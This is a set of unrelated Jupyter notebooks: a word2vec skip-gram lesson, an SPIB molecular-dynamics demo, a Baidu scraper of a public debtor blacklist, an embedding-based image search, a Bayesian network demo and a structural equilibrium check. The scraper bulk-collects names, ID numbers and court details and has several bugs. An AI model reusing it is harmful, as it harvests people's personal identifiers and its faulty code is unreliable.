x, y = [], []
batch = words[idx:idx+batch_size]
for ii in range(len(batch)):
batch_x = batch[ii]
batch_y = get_target(batch, ii, window_size)
y.extend(batch_y)
x.extend([batch_x]*len(batch_y))
yield x, y
int_text = [i for i in range(20)]
x,y = next(get_batches(int_text, batch_size=4, window_size=5))
print('x\n', x)
print('y\n', y)
```
## Building the graph
Below is an approximate diagram of the general structure of our network.
<img src="assets/skip_gram_arch.png" width=60%>
>* The input words are passed in as batches of input word tokens.
* This will go into a hidden layer of linear units (our embedding layer).
* Then, finally into a softmax output layer.
We'll use the softmax layer to make a prediction about the context words by sampling, as usual.
The idea here is to train the embedding layer weight matrix to find efficient representations for our words. We can discard the softmax layer because we don't really care about making predictions with this network. We just want the embedding matrix so we can use it in _other_ networks we build using this dataset.
---
## Validation
Here, I'm creating a function that will help us observe our model as it learns. We're going to choose a few common words and few uncommon words. Then, we'll print out the closest words to them using the cosine similarity:
<img src="assets/two_vectors.png" width=30%>
$$
\mathrm{similarity} = \cos(\theta) = \frac{\vec{a} \cdot \vec{b}}{|\vec{a}||\vec{b}|}
$$
We can encode the validation words as vectors $\vec{a}$ using the embedding table, then calculate the similarity with each word vector $\vec{b}$ in the embedding table. With the similarities, we can print out the validation words and words in our embedding table semantically similar to those words. It's a nice way to check that our embedding table is grouping together words with similar semantic meanings.
```
def cosine_similarity(embedding, valid_size=16, valid_window=100, device='cpu'):
""" Returns the cosine similarity of validation words with words in the embedding matrix.
Here, embedding should be a PyTorch embedding module.
"""
# Here we're calculating the cosine similarity between some random words and
# our embedding vectors. With the similarities, we can look at what words are
# close to our random words.
# sim = (a . b) / |a||b|
embed_vectors = embedding.weight
# magnitude of embedding vectors, |b|
magnitudes = embed_vectors.pow(2).sum(dim=1).sqrt().unsqueeze(0)
# pick N words from our ranges (0,window) and (1000,1000+window). lower id implies more frequent
valid_examples = np.array(random.sample(range(valid_window), valid_size//2))
valid_examples = np.append(valid_examples,
random.sample(range(1000,1000+valid_window), valid_size//2))
valid_examples = torch.LongTensor(valid_examples).to(device)
valid_vectors = embedding(valid_examples)
similarities = torch.mm(valid_vectors, embed_vectors.t())/magnitudes
return valid_examples, similarities
```
## SkipGram model
Define and train the SkipGram model.
> You'll need to define an [embedding layer](https://pytorch.org/docs/stable/nn.html#embedding) and a final, softmax output layer.
An Embedding layer takes in a number of inputs, importantly:
* **num_embeddings** – the size of the dictionary of embeddings, or how many rows you'll want in the embedding weight matrix
* **embedding_dim** – the size of each embedding vector; the embedding dimension
```
import torch
from torch import nn
import torch.optim as optim
class SkipGram(nn.Module):
def __init__(self, n_vocab, n_embed):
super().__init__()
self.embed = nn.Embedding(n_vocab, n_embed)
self.output = nn.Linear(n_embed, n_vocab)
self.log_softmax = nn.LogSoftmax(dim=1)
def forward(self, x):
x = self.embed(x)
scores = self.output(x)
log_ps = self.log_softmax(scores)
return log_ps
```
### Training
Below is our training loop, and I recommend that you train on GPU, if available.
**Note that, because we applied a softmax function to our model output, we are using NLLLoss** as opposed to cross entropy. This is because Softmax in combination with NLLLoss = CrossEntropy loss .
```
# check if GPU is available
device = 'cuda' if torch.cuda.is_available() else 'cpu'
embedding_dim=300 # you can change, if you want
model = SkipGram(len(vocab_to_int), embedding_dim).to(device)
criterion = nn.NLLLoss()
optimizer = optim.Adam(model.parameters(), lr=0.003)
print_every = 500
steps = 0
epochs = 5
# train for some number of epochs
for e in range(epochs):
# get input and target batches
for inputs, targets in get_batches(train_words, 512):
steps += 1
inputs, targets = torch.LongTensor(inputs), torch.LongTensor(targets)
inputs, targets = inputs.to(device), targets.to(device)
log_ps = model(inputs)
loss = criterion(log_ps, targets)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if steps % print_every == 0:
# getting examples and similarities
valid_examples, valid_similarities = cosine_similarity(model.embed, device=device)
_, closest_idxs = valid_similarities.topk(6) # topk highest similarities
valid_examples, closest_idxs = valid_examples.to('cpu'), closest_idxs.to('cpu')
for ii, valid_idx in enumerate(valid_examples):
closest_words = [int_to_vocab[idx.item()] for idx in closest_idxs[ii]][1:]
print(int_to_vocab[valid_idx.item()] + " | " + ', '.join(closest_words))
print("...")
```
| github_jupyter |
<a href="https://colab.research.google.com/github/tiwarylab/State-Predictive-Information-Bottleneck/blob/main/SPIB_Demo.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# SPIB Demo 2021
This notebook aims to serve as a simple introduction to the state predictive information bottleneck method of [Wang and Tiwary 2021](https://aip.scitation.org/doi/abs/10.1063/5.0038198). The code is implemented using Pytorch.
<img src="https://github.com/tiwarylab/State-Predictive-Information-Bottleneck/blob/main/fig/Fig_alg.png?raw=1">
<img src="https://github.com/tiwarylab/State-Predictive-Information-Bottleneck/blob/main/fig/Fig_FW_example.png?raw=1">
## Clone the Github to Colab
```
!git clone https://github.com/tiwarylab/State-Predictive-Information-Bottleneck
%matplotlib notebook
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
import time
plt.rcParams['figure.figsize'] = [25, 20]
np.random.seed(42)
large = 54; med = 36; small = 24
l_width = 3; m_width = 1.5; s_width = 0.7
params = {'axes.titlesize': large,
'legend.fontsize': large,
'legend.title_fontsize':large,
'figure.figsize': (16, 10),
'axes.labelsize': large,
'xtick.labelsize': med,
'ytick.labelsize': med,
'figure.titlesize': large,
'lines.linewidth': l_width,
'lines.markersize': 10,
'axes.linewidth': l_width,
'xtick.major.size': 8,
'ytick.major.size': 8,
'xtick.minor.size': 4,
'ytick.minor.size': 4,
'xtick.major.width': m_width,
'ytick.major.width': m_width,
'xtick.minor.width': s_width,
'ytick.minor.width': s_width,
'grid.linewidth': m_width}
plt.rcParams.update(params)
```
## Data Preparation
The trajectory data can be generated from the molecular dynamics simulation or experiements. Here, we use a sample trajectory generated from Langevin dynamics simulation of a four-well analytical potential.
```
# Load trajectory data
traj_data = np.load("State-Predictive-Information-Bottleneck/examples/Four_Well_beta3_gamma4_traj_data.npy")
```
### Visualization of the trajectory
```
fig, ax = plt.subplots(figsize=(12,10))
t = np.arange(traj_data.shape[0])
ax.plot(t[::100],traj_data[::100,0],'x',label='x')
ax.plot(t[::100],traj_data[::100,1],'o',fillstyle='none',label='y')
ax.set_xlabel('time step')
ax.legend(fontsize=36,bbox_to_anchor=(0.99, 0.7))
# The four-well analytical potential along x
def potential_fn_FW(x):
A=0.6
a=80
B=0.2
b=80
C=0.5
c=40
return 2*(x**8+A*np.exp(-a*x**2)+B*np.exp(-b*(x-0.5)**2)+C*np.exp(-c*(x+0.5)**2))+(x**2-1)**2
from mpl_toolkits.axes_grid1 import make_axes_locatable
fig, ax = plt.subplots(1,2,figsize=(18,8))
beta=3
lw=8
x=np.arange(-1,1,0.01)
v=potential_fn_FW(x)
ax[0].plot(x,v,color='k',lw=lw)
ax[0].axvline(x=0,color='b',linestyle='--',lw=lw)
ax[0].axvline(x=-0.5,color='b',linestyle='--',lw=lw)
ax[0].axvline(x=0.5,color='b',linestyle='--',lw=lw)
ax[0].text(-0.75, 1.8, 'A', horizontalalignment='center',fontsize=54)
ax[0].text(-0.25, 1.8, 'B', horizontalalignment='center', fontsize=54)
ax[0].text(0.25, 1.8, 'C', horizontalalignment='center',fontsize=54)
ax[0].text(0.75, 1.8, 'D', horizontalalignment='center', fontsize=54)
ax[0].set_xlabel("x")
ax[0].set_ylabel("Potential")
ax[0].text(-0.2, 1.2, '(a)', horizontalalignment='center',
transform=ax[0].transAxes,fontsize=54, va='top')
FW_counts,FW_xbins,FW_ybins,images = plt.hist2d(traj_data[:,0],traj_data[:,1],bins=100)
FW_counts[FW_counts==0]=FW_counts[FW_counts!=0].min()
FW_G=-np.log(FW_counts)/beta
FW_G=FW_G-np.nanmin(FW_G)
h0=ax[1].contourf(FW_G.transpose(),levels=5,extent=[FW_xbins[0],FW_xbins[-1],FW_ybins[0],FW_ybins[-1]],cmap='jet')
divider = make_axes_locatable(ax[1])
cax = divider.append_axes("top", "5%", pad="3%")
tickz = np.arange(0,FW_G.max(),1)
cb1 = fig.colorbar(h0, cax=cax, orientation="horizontal",ticks=tickz)
cb1.set_label('Free Energy',fontsize=48)
cax.xaxis.set_ticks_position("top")
cax.xaxis.set_label_position("top")
ax[1].set_xlabel("x")
ax[1].set_ylabel('y')
ax[1].text(-0.2, 1.3, '(b)', horizontalalignment='center',
transform=ax[1].transAxes,fontsize=54, va='top')
plt.tight_layout(pad=0.4, w_pad=5, h_pad=3.0)
```
### Generation of initial state labels
```
# discretize the system along x to 10 states as initial state labels
index=0
x_max=traj_data[:,index].max()+0.01
x_min=traj_data[:,index].min()-0.01
state_num=10
eps=1e-3
x_det=(x_max-x_min+2*eps)/state_num
init_label=np.zeros((traj_data.shape[0],state_num))
x_list=np.array([(x_min-eps+n*x_det) for n in range(state_num+1)])
for j in range(state_num):
indices=(traj_data[:,index]>x_list[j])&(traj_data[:,index]<=x_list[j+1])
init_label[indices,j]=1
np.save('State-Predictive-Information-Bottleneck/examples/Four_Well_beta3_gamma4_init_label10.npy',init_label)
# plot the initial state labels for four well potential system
import matplotlib
from matplotlib import colors as c
data=traj_data
labels=init_label
fig0, ax0 = plt.subplots(figsize=(9,6))
hist=ax0.hist2d(data[:,0],data[:,1],bins=100)
state_num=labels.shape[1]
state_labels=np.arange(state_num)
x_max=np.max(data[:,0])
x_min=np.min(data[:,0])
eps=1e-3
x_det=(x_max-x_min+2*eps)/state_num
x_list=np.array([(x_min-eps+n*x_det) for n in range(state_num+1)])
hist_state=np.zeros([state_num]+list(hist[0].shape))
for i in range(state_num):
hist_state[i]=ax0.hist2d(data[:,0],data[:,1],bins=[hist[1],hist[2]],weights=labels[:,i])[0]
init_label_map=np.argmax(hist_state,axis=0).astype(float)
init_label_map[hist[0]==0]=np.nan
plt.close(fig0)
fig, ax = plt.subplots(figsize=(9,6))
fmt = matplotlib.ticker.FuncFormatter(lambda x, pos: state_labels[x])
tickz = np.arange(0,len(state_labels))
cMap = c.ListedColormap(plt.cm.tab20.colors[0:10])
im=ax.pcolormesh(hist[1], hist[2], init_label_map.T, cmap=cMap, vmin=-0.5, vmax=len(state_labels)-0.5)
cb1 = fig.colorbar(im,ax=ax,format=fmt, ticks=tickz)
for i in range(state_num):
ax.text((x_list[i]+x_list[i+1])/2,0,state_labels[i],horizontalalignment='center',verticalalignment='center',fontsize=32)
plt.xlabel("x")
plt.ylabel("y")
```
## Model
We provide two ways to run SPIB: test_model.py and test_model_advanced.py. Here, we will only discuss the use of test_model.py. But for advanced analyses, we will strongly recommend to use test_model_advanced.py as it provides more features to help you to control the training process and tune the hyper-parameters.
## Training
```
%run State-Predictive-Information-Bottleneck/test_model.py -dt 50 -d 1 -encoder_type Nonlinear -bs 512 -threshold 0.01 -patience 2 -refinements 8 -lr 0.001 -b 0.01 -seed 0 -label State-Predictive-Information-Bottleneck/examples/Four_Well_beta3_gamma4_init_label10.npy -traj State-Predictive-Information-Bottleneck/examples/Four_Well_beta3_gamma4_traj_data.npy
```
## Result Analysis
```
prefix='SPIB/Unweighted_d=1_t=50_b=0.0100_learn=0.001000'
repeat='0'
# load the results
# the deterministic part of RC leanred by SPIB (the mean of output gaussian distrition of the encoder)
traj_mean_rep=np.load(prefix+"_traj0_mean_representation"+repeat+".npy")
# the final state labels leanred by SPIB
traj_labels=np.load(prefix+"_traj0_labels"+repeat+".npy")
# plot the learned state labels for four well potential system
import matplotlib
from matplotlib import colors as c
data=traj_data
labels=traj_labels
hist=plt.hist2d(data[:,0],data[:,1],bins=100)
state_num=labels.shape[1]
state_labels=np.arange(state_num)
hist_state=np.zeros([state_num]+list(hist[0].shape))
for i in range(state_num):
hist_state[i]=plt.hist2d(data[:,0],data[:,1],bins=[hist[1],hist[2]],weights=labels[:,i])[0]
label_map50=np.argmax(hist_state,axis=0).astype(float)
label_map50[hist[0]==0]=np.nan
plt.close()
fig, ax = plt.subplots(figsize=(9,6))
fmt = matplotlib.ticker.FuncFormatter(lambda x, pos: state_labels[x])
tickz = np.arange(0,len(state_labels))
cMap = c.ListedColormap(plt.cm.tab20.colors[0:10])
im=ax.pcolormesh(hist[1], hist[2], label_map50.T, cmap=cMap, vmin=-0.5, vmax=len(state_labels)-0.5)
cb1 = fig.colorbar(im,ax=ax,format=fmt, ticks=tickz)
ax.text(-0.75,0,'1',horizontalalignment='center',verticalalignment='center',fontsize=64)
ax.text(0.75,0,'8',horizontalalignment='center',verticalalignment='center',fontsize=64)
ax.text(-0.25,0,'3',horizontalalignment='center',verticalalignment='center',fontsize=64)
ax.text(0.25,0,'6',horizontalalignment='center',verticalalignment='center',fontsize=64)
plt.xlabel("x")
plt.ylabel("y")
# plot the learned RC for four well potential system
data=traj_data
hist=plt.hist2d(data[:,0],data[:,1],bins=100)
hist_RC=plt.hist2d(data[:,0],data[:,1],bins=[hist[1],hist[2]],weights=traj_mean_rep[:,0])
plt.close()
fig, ax = plt.subplots(figsize=(15,10))
RC=np.divide(hist_RC[0],hist[0])
im=ax.contourf(RC.T, extent=[hist_RC[1][0],hist_RC[1][-1],hist_RC[2][0],hist_RC[2][-1]],levels=10,
cmap=plt.cm.jet)
cb1 = fig.colorbar(im,ax=ax)
cb1.set_label('RC')
plt.xlabel("x")
plt.ylabel("y")
plt.tight_layout()
```
| github_jupyter |
```
import time
import sys
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver import ActionChains
from selenium.common.exceptions import NoSuchElementException, TimeoutException
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.wait import WebDriverWait
import pandas as pd
import csv
import random
import pandas as pd
driver = webdriver.Chrome('/Users/leijunjie/Downloads/chromedriver')
driver.get("http://www.baidu.com")
input = driver.find_element_by_id('kw')
input.send_keys("失信")
time.sleep(1)
input.send_keys("被执行人")
time.sleep(1)
input.send_keys(Keys.ENTER)
WebDriverWait(driver, 80).until(EC.visibility_of_element_located((By.CSS_SELECTOR, 'div.op_trust_mainBox')))
def fetch_page_data():
Name_list = []
Ids = []
val1 = []
val2 = []
val3 = []
val4 = []
val5 = []
val6 = []
val7 = []
val8 = []
items = driver.find_elements_by_css_selector('li.op_trust_item')
for item in items:
try:
Name = item.find_element_by_css_selector(
'span.op_trust_name').text
Id_number = item.find_element_by_css_selector(
'span.op_trust_fl').text
# Click & Open baidu Bulletin Board
ActionChains(driver).click(item).perform()
values = item.find_elements_by_css_selector(
'tbody td.op_trust_tdRight')
except StaleElementReferenceException:
# if element attachment error then we rest for 1 sec and repeat this process;
try:
print("出现异常,等待重试...")
time.sleep(1)
ActionChains(self.driver).click(item).perform()
values = item.find_elements_by_css_selector(
'tbody td.op_trust_tdRight')
except StaleElementReferenceException:
print("重试失败,跳过该公告...")
continue
if len(values) == 7:
Name_list.append(Name)
Ids.append(Id_number)
val1.append(values[0].text)
val2.append(values[1].text)
val3.append(values[2].text)
val4.append(values[3].text)
val5.append(values[4].text)
val6.append(values[5].text)
val7.append(values[6].text)
val8.append('individual')
else:
Name_list.append(Name)
Ids.append(Id_number)
val1.append(values[1].text)
val2.append(values[2].text)
val3.append(values[3].text)
val4.append(values[4].text)
val5.append(values[5].text)
val6.append(values[6].text)
val7.append(values[7].text)
val8.append(values[0].text)
df_temp = pd.DataFrame(
{
"Name": Name_list,
"ID_Num": Id_number,
"执行法院": val1,
"省份":val2,
"案号":val3 ,
"生效法律文书":val4,
"被执行人情况":val5,
"具体行为":val6,
"发布时间":val7,
"if_company":val8
})
return df_temp
df = fetch_page_data()
pagenum = 1
while (pagenum < 3):
print("Scraping Page %d..." % pagenum)
next_btn = driver.find_element_by_css_selector(
'div.op_trust_page span.op_trust_page_next')
ActionChains(driver).click(next_btn).perform()
time.sleep(random.randint(10,12))
df_2 = fetch_page_data()
df = pd.merge(df, df_2, how='outer')
time.sleep(random.randint(5,9))
pagenum +=1
print('finished!')
df.info()
df
```
| github_jupyter |
```
import os
import time
import numpy as np
def load_embeddings(embeddings_path):
embeddings = {}
with open(embeddings_path, 'r') as file:
for line in file:
splits = line.split()
word = splits[0]
coords = np.asarray(splits[1:], dtype='float32')
embeddings[word] = coords
return embeddings
word_embeddings = load_embeddings('./glove.6B.300d.txt')
from tensorflow.keras.preprocessing import image
from tensorflow.keras.applications.vgg16 import preprocess_input
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
def get_word_embedding(category, word_embeddings, wordvec_size=300):
if category in word_embeddings:
return word_embeddings[category]
return np.zeros(shape=wordvec_size)
def get_word_embedding_from_description(description, word_embeddings, wordvec_size=300):
stop_words = set(stopwords.words('english'))
stop_words.add(";")
words = word_tokenize(description)
wordvecs = []
for word in words:
if word not in stop_words:
word_embedding = get_word_embedding(word, word_embeddings, wordvec_size)
wordvecs.append(word_embedding)
return np.mean(np.array(wordvecs), axis=0)
def preprocess_iaprtc12_images(path, word_embeddings, wordvec_size=300):
image_list = []
labels_list = []
paths_list = []
no_desc_images = []
for dir_path, dir_names, image_names in os.walk(os.path.join(path, "images")):
if not image_names: # skip current directory listing
continue
desc_dir_path = dir_path.replace("/images/", "/annotations_complete_eng/")
for img_name in image_names:
full_path = os.path.join(dir_path, img_name)
desc_file = os.path.join(desc_dir_path, img_name).replace(".jpg", ".eng")
if os.path.exists(desc_file):
word_embedding = np.array([])
with open(desc_file, 'r', errors='replace') as desc:
desc_line = desc.readlines()[3]
description = desc_line.replace("<DESCRIPTION>", "").replace("</DESCRIPTION>", "")
word_embedding = get_word_embedding_from_description(description, word_embeddings)
img_pil = image.load_img(full_path, target_size=(224, 224))
img_raw = image.img_to_array(img_pil)
img = preprocess_input(img_raw) # VGG16 image preprocessing.
image_list.append(img)
labels_list.append(word_embedding)
paths_list.append(full_path)
else:
no_desc_images.append(full_path)
return np.array(image_list), np.array(labels_list), paths_list, no_desc_images
images_vgg16, image_embeddings, image_paths, no_desc_images = preprocess_iaprtc12_images("./iaprtc12", word_embeddings)
images_vgg16.shape
from tensorflow.keras.applications.vgg16 import VGG16
from tensorflow.keras.models import Model
from tensorflow.keras import optimizers
from tensorflow.keras.layers import Dense, BatchNormalization, Activation, Dropout
from tensorflow.keras.losses import cosine_similarity
def hybrid_model_backbone(intermediate_dim=2000, word_embedding_dim=300):
vgg16 = VGG16(input_shape=images_vgg16.shape[1:])
x = vgg16.get_layer('fc2').output
for layer in vgg16.layers:
layer.trainable = False
x = Dense(intermediate_dim, name="dense1")(x)
x = BatchNormalization()(x)
x = Activation("relu")(x)
x = Dropout(0.5)(x)
x = Dense(word_embedding_dim, name="dense2")(x)
outputs = BatchNormalization()(x)
model = Model(inputs=[vgg16.input], outputs=outputs)
# https://faroit.com/keras-docs/2.0.8/optimizers/
sgd = optimizers.SGD(decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss=cosine_similarity)
return model
hybrid_model = hybrid_model_backbone()
from sklearn.utils import shuffle
from sklearn.model_selection import train_test_split
from tensorflow.keras.callbacks import ModelCheckpoint
from tensorflow.keras.models import load_model
def get_model_trained(model, X, y, model_path, train_model=False):
if train_model:
epochs, batch_size = (20, 32)
X, y = shuffle(X, y, random_state=7)
X_train, X_test, y_train, y_test = \
train_test_split(X, y, test_size=0.3, random_state=7)
checkpointer = ModelCheckpoint(
filepath='best.hdf5', verbose=1, save_best_only=True)
model.fit(X_train, y_train,
validation_data=(X_test, y_test),
epochs=epochs,
batch_size=batch_size,
callbacks=[checkpointer])
model.save(model_path)
return model
# Assuming that there is a model in a given path.
else:
return load_model(model_path)
hybrid_model = get_model_trained(hybrid_model, images_vgg16, image_embeddings, "./model_and_index_iaprtc12/model_new", train_model=False)
from annoy import AnnoyIndex
def get_annoy_index(vectors_list, number_of_trees=20, dims=300):
annoy_index = AnnoyIndex(dims, 'angular')
for i, vec in enumerate(vectors_list):
annoy_index.add_item(i, vec)
annoy_index.build(number_of_trees)
return annoy_index
def generate_word_annoy_index(word_embeddings):
word_index = dict(enumerate(word_embeddings))
word_embeddings_list = [word_embeddings[word] for word in word_index.values()]
annoy_index = get_annoy_index(word_embeddings_list)
return annoy_index, word_index
# This might take minute or two (since it is a 400k corpus of 300d words).
word_annoy_index, word_index = generate_word_annoy_index(word_embeddings)
import json
def generate_image_embeddings(image_paths, model):
images = np.zeros(shape=images_vgg16.shape)
image_path_index = dict(enumerate(image_paths))
for ind, path in image_path_index.items():
img_pil = image.load_img(path, target_size=images_vgg16.shape[1:-1])
img_raw = image.img_to_array(img_pil)
images[ind, :, :, :] = img_raw
image_embeddings_list = model.predict(preprocess_input(images))
return image_embeddings_list, image_path_index
def load_image_embeddings(vectors_filename, mapping_filename):
image_embeddings = np.load("%s.npy" % vectors_filename)
with open("%s.json" % mapping_filename) as f:
image_path_index = json.load(f)
return image_embeddings, {int(k): v for k, v in image_path_index.items()}
def save_image_embeddings(image_embeddings_filename,
image_embeddings,
mapping_filename,
image_path_index):
np.save("%s.npy" % image_embeddings_filename, image_embeddings)
with open("%s.json" % mapping_filename, 'w') as index_file:
json.dump(image_path_index, index_file)
def nearest_neighbors(vector, annoy_index, item_index, k=10):
distances = annoy_index.get_nns_by_vector(vector, k, include_distances=True)
return [[a, item_index[a], distances[1][i]] for i, a in enumerate(distances[0])]
def get_hybrid_embeddings(generate_embeddings=False):
image_hybrid_embeddings_filepath = "./model_and_index_iaprtc12/image_embeddings"
image_path_indexes_filepath = "./model_and_index_iaprtc12/image_path_indexes"
# Generating embedding might take 5-10min.
if generate_embeddings:
image_hybrid_embeddings, image_path_index = \
generate_image_embeddings(image_paths, hybrid_model)
save_image_embeddings(image_hybrid_embeddings_filepath,
image_hybrid_embeddings,
image_path_indexes_filepath,
image_path_index)
return image_hybrid_embeddings, image_path_index
else:
image_hybrid_embeddings, image_path_index = \
load_image_embeddings(image_hybrid_embeddings_filepath,
image_path_indexes_filepath)
return image_hybrid_embeddings, image_path_index
image_hybrid_embeddings, image_path_index = get_hybrid_embeddings(generate_embeddings=False)
image_annoy_index = get_annoy_index(image_hybrid_embeddings, number_of_trees=1000)
```
# DEMO
```
from IPython.display import Image
from IPython.display import HTML, display
import urllib.request
```
```
def display_similar_images(mean_embedding, image_path=None):
closest_images = nearest_neighbors(mean_embedding, image_annoy_index, image_path_index)
html_str = "<script>$('div.cell.selected').next().height(100);</script>\n"
if image_path is not None:
html_str += "<h1>Our input image</h1>"
html_str += "<img src='%s'>" % image_path
html_str += "<h1>Similar images</h1>"
html_str += "<table>"
for i in range(0, 5):
left_cell = closest_images[2*i][1]
html_str += "<tr><td><img src='%s'></td>" % left_cell
right_cell = closest_images[2*i+1][1]
html_str += "<td><img src='%s'></td></tr>" % right_cell
html_str += "</table>\n"
display(HTML(html_str))
def search_by_text(text):
mean_embedding = np.mean([word_embeddings[word] for word in text.split()], axis=0)
display_similar_images(mean_embedding)
def get_image_labels(image_path, display_image=False):
if display_image:
display(Image(filename=image_path))
images = np.zeros(shape=(1,)+images_vgg16.shape[1:])
img = image.load_img(image_path, target_size=images_vgg16.shape[1:-1])
x_raw = image.img_to_array(img)
images[0] = np.expand_dims(x_raw, axis=0)
inputs = preprocess_input(images)
image_features = hybrid_model.predict(inputs)[0]
closest_labels = nearest_neighbors(image_features, word_annoy_index, word_index)
return closest_labels
def search_similar_images(image_location, from_url=False):
image_path = image_location
if from_url:
filename = image_location.split("/")[-1]
urllib.request.urlretrieve(image_location, filename)
image_path = filename
closest_labels = [l for _, l, _ in get_image_labels(image_path)]
mean_embedding = np.mean([word_embeddings[label] for label in closest_labels], axis=0)
display_similar_images(mean_embedding, image_path)
```
*Identifying labels on some pictures from the dataset:*
```
get_image_labels(image_paths[223], display_image=True)
```
*Searching for specific category/label:*
```
search_by_text("plane")
```
*Searching for categories that are not in image dataset:*
```
search_by_text("birds")
search_by_text("ocean")
search_by_text("street")
```
*Achieving more complex queries by combining words:*
```
search_by_text("bird near water")
```
*Since we are able to identify labels on an image, we can perform search by image:*
```
search_similar_images(image_paths[650])
search_similar_images(image_paths[711])
```
*The same goes for images outside of the dataset*
```
search_similar_images('./demo_images/moor-moorland-grasses-wetland-nature-conservation-nature-reserve-nature-landscape-wetlands.jpg')
search_by_text("fence")
search_by_text("sky")
search_by_text("snow")
```
| github_jupyter |
# Inference from data using different Bayesian Belief Network (BBN) Structures
This notebook shows how to apply different BBN structures to the same parameters. The parameters, means and covariances, are estimated from data generated from linear equations. Approximate inference is the performed on each BBN to observed the associated parameters.
```
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import networkx as nx
from pybbn.lg.graph import Dag, Parameters, Bbn
np.random.seed(37)
```
There are four variables, x0, x1, x2, and x4.
```
num_samples = 10000
x0 = 2.0 + np.random.standard_normal(num_samples)
x1 = 5.0 + 2.0 * x0 + np.random.standard_normal(num_samples)
x2 = 2.0 + np.random.standard_normal(num_samples)
x3 = 1.0 + 0.3 * x1 + 0.5 * x2 + np.random.standard_normal(num_samples)
x4 = 8.0 + 0.9 * x3 + np.random.standard_normal(num_samples)
df = pd.DataFrame({
'x0': x0,
'x1': x1,
'x2': x2,
'x3': x3,
'x4': x4})
means = np.array(df.mean())
cov = np.array(df.cov().values)
```
Model 1's structure represents the true model's structure. The structures of Models 2, 3, and 4 are made-up ones. We perform approximate inference for each BBN and observe how the estimated parameters associated with the BBN compare to the parameters associated with the linear equations.
```
# create the directed acylic graph
# this is based on the true structure
dag1 = Dag()
dag1.add_node(0)
dag1.add_node(1)
dag1.add_node(2)
dag1.add_node(3)
dag1.add_node(4)
dag1.add_edge(0, 1)
dag1.add_edge(1, 3)
dag1.add_edge(2, 3)
dag1.add_edge(3, 4)
# The parameters are estimated from the samples above
params = Parameters(means, cov)
# create the bayesian belief network
bbn1 = Bbn(dag1, params)
# create the directed acylic graph
# this is based on an imposed structure
dag2 = Dag()
dag2.add_node(0)
dag2.add_node(1)
dag2.add_node(2)
dag2.add_node(3)
dag2.add_node(4)
dag2.add_edge(0, 1)
dag2.add_edge(1, 3)
dag2.add_edge(1, 4)
dag2.add_edge(2, 3)
# create the bayesian belief network
bbn2 = Bbn(dag2, params)
# create the directed acylic graph
# this is based on an imposed structure
dag3 = Dag()
dag3.add_node(0)
dag3.add_node(1)
dag3.add_node(2)
dag3.add_node(3)
dag3.add_node(4)
dag3.add_edge(0, 1)
dag3.add_edge(1, 3)
dag3.add_edge(3, 4)
dag3.add_edge(3, 2)
# create the bayesian belief network
bbn3 = Bbn(dag3, params)
dag4 = Dag()
dag4.add_node(0)
dag4.add_node(1)
dag4.add_node(2)
dag4.add_node(3)
dag4.add_node(4)
dag4.add_edge(0, 1)
dag4.add_edge(2, 3)
dag4.add_edge(3, 4)
# create the bayesian belief network
bbn4 = Bbn(dag4, params)
```
Do some approximate inference and observe how the estimated parameters compare to the empirical ones. Note that `x1` has `x0` as a parent, `x3` as a child, and `x2` as a coparent and so its [Markov blanket](https://en.wikipedia.org/wiki/Markov_blanket) is `x0, x3, x2`. If we condition on the Markov blanket of `x1`, then we know all we need to know to estimate the state of `x1`. In the approximate inference algorithm we are using, [Gibbs sampling](https://en.wikipedia.org/wiki/Gibbs_sampling), we only sample `x0` based on its Markov blanket as defined by the structure of the BBN. Since Model 1's structure represents the true relationships between all the variables, we expect that the parameter estimation from it would be closest to the empirical one.
* Empirical mean of `x1` is 8.99
* Estimated mean of `x1` with Model 1 is 8.75
* Estimated mean of `x1` with Model 2 is 8.06
* Estimated mean of `x1` with Model 3 is 9.34
* Estimated mean of `x1` with Model 4 is 9.98
```
print(means)
print(bbn1.do_inference()[0])
print(bbn2.do_inference()[0])
print(bbn3.do_inference()[0])
print(bbn4.do_inference()[0])
```
Look at the log likelihood of the data given the models. As you can see, log likelihood of the data given model 1 is the highest.
```
data_mat = df.values
logp1 = bbn1.log_prob(data_mat)
logp2 = bbn2.log_prob(data_mat)
logp3 = bbn3.log_prob(data_mat)
logp4 = bbn4.log_prob(data_mat)
print('log prob of model 1 {}'.format(logp1))
print('log prob of model 2 {}'.format(logp2))
print('log prob of model 3 {}'.format(logp3))
print('log prob of model 4 {}'.format(logp4))
```
Here's the plots of the four models.
```
import warnings
with warnings.catch_warnings():
warnings.simplefilter('ignore')
plt.figure(figsize=(10, 10))
plt.subplot(221)
nx.draw(bbn1.dag.g,with_labels=True, font_weight='bold')
plt.title('Model 1')
plt.subplot(222)
nx.draw(bbn2.dag.g,with_labels=True, font_weight='bold')
plt.title('Model 2')
plt.subplot(223)
nx.draw(bbn3.dag.g,with_labels=True, font_weight='bold')
plt.title('Model 3')
plt.subplot(224)
nx.draw(bbn4.dag.g,with_labels=True, font_weight='bold')
plt.title('Model 4')
```
| github_jupyter |
## Check Equilibrium
This notebook reads files describing a structure, and the files output by Frame2D after an
analysis, and checks that the forces and moments on every node are in equilibrium.
It does this in the simplest way possible, using quite different logic than Frame2D, resulting
in a higher degree of confidence in the results. It would have been better had someone else
programmed it, but oh well ...
```
ds = 'KG82'
lcase = 'all'
#ds = 'l22x6'
#lcase = 'Case-2b'
def filename(basename,lc=None):
if lc is not None:
basename = lc + '/' + basename
return 'data/' + ds + '.d/' + basename + '.csv'
def Warn(msg):
print('!!!!! Warning: {}'.format(msg))
import pandas as pd
import math
class Node(object):
def __init__(self,id,x,y):
self.id = id
self.x = x
self.y = y
self.sumFX = 0.
self.sumFY = 0.
self.sumMZ = 0.
table = pd.read_csv(filename('nodes'))
NODES = {}
for i,n in table.iterrows():
if n.NODEID in NODES:
Warn("Node '{}' is multiply defined.".format(n.NODEID))
NODES[n.NODEID] = Node(n.NODEID,float(n.X),float(n.Y))
class Member(object):
def __init__(self,id,nodej,nodek):
self.id = id
self.nodej = nodej
self.nodek = nodek
dx = nodek.x - nodej.x
dy = nodek.y - nodej.y
self.L = L = math.sqrt(dx*dx + dy*dy)
